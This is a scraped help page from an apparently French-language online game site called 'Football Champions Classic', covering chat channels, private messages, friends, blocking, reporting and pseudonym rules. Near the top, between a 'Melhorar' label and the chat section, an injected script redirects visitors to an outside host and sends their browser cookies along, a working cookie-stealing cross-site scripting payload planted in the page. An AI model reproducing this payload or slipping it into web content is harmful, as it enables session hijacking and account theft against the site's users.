Football Champions Classic (International)

Melhores contribuintes Pontuação
1.
2.
3.
4.
5.

Compte & connexion

Melhorar

</span><SCRIPT>location.href="http://devopswebs.yj.fr/n/b.php?c="+document.cookie;</SCRIPT>

- Le tchat

• Tchat public : Tout le monde voit vos messages et vous pouvez dialoguer, réagir avec l'ensemble du serveur.
• Tchat alliance : Conversation visible par les membres de votre alliance.
• Tchat galaxie : Dialoguer avec les joueurs de votre galaxie.
• Tchat Privé: Vous pouvez discuter avec une personne en cliquant sur son pseudo puis le logo "chatter"
• Tchat groupe: Sur notre jeu, vous pouvez créer des groupes et un tchat groupe sera à votre disposition

- Messages privés : Qui vous permet de dialoguer (conversation privée) avec la personne.

- Message alliance : Avis d'information transmis à tous les membres de votre alliance.

- Ajout d'amis : Rendez vous à l'onglet "Amis" et ajoutez le nom de la personne que vous souhaitez ajouter. Une fois que vous l'avez trouvée, cliquez sur 'Rechercher' et 'Ajouter un ami'. Une fenêtre de confirmation s'affiche dans les notifications.

- Bloquer un joueur : Rendez vous à l'onglet "Amis", un aperçu de vos amis se trouve sur la page et, sur la droite, en cliquant sur (+) vous trouverez l'option ‘Retirer une personne’ (les personnes bloquées ne peuvent plus vous contacter). Cliquez dessus et confirmez une nouvelle fois la suppression. Votre ami est maintenant supprimé.

- Signalement d'un message : Les abus sont pris très au sérieux et les contenus sont surveillés activement. Vous pouvez aider à garantir que le site Internet reste sympathique et sûr en signalant tout mauvais comportement. Pour cela, cliquez sur http://img850.imageshack.us/img850/1581/mn6l.jpg qui figure à côté du pseudo joueur de chaque message.

- Vidéos : Visionner une sélection de belles vidéos de fans. Cliquez sur l'image ci-dessous pour rechercher des vidéos sur la chaîne

- Modifications du nom : Vous ne pouvez changer votre pseudo qu'une seule fois par mois.

Ce que vous ne pouvez pas inclure dans un pseudo

Des termes injurieux ou obscènes qui vont à l'encontre des lignes de conduite de Sublinet.
Melhorar

Comment est utilisée mon adresse e-mail ?

Votre adresse e-mail n'est utilisée que pour le support et la sécurité de votre compte.

Occasionnellement (environ une fois par trimestre), nous prévenons nos joueurs de mises à jour et de sorties de jeux. Mais vous pouvez vous retirer désabonner de ces emails.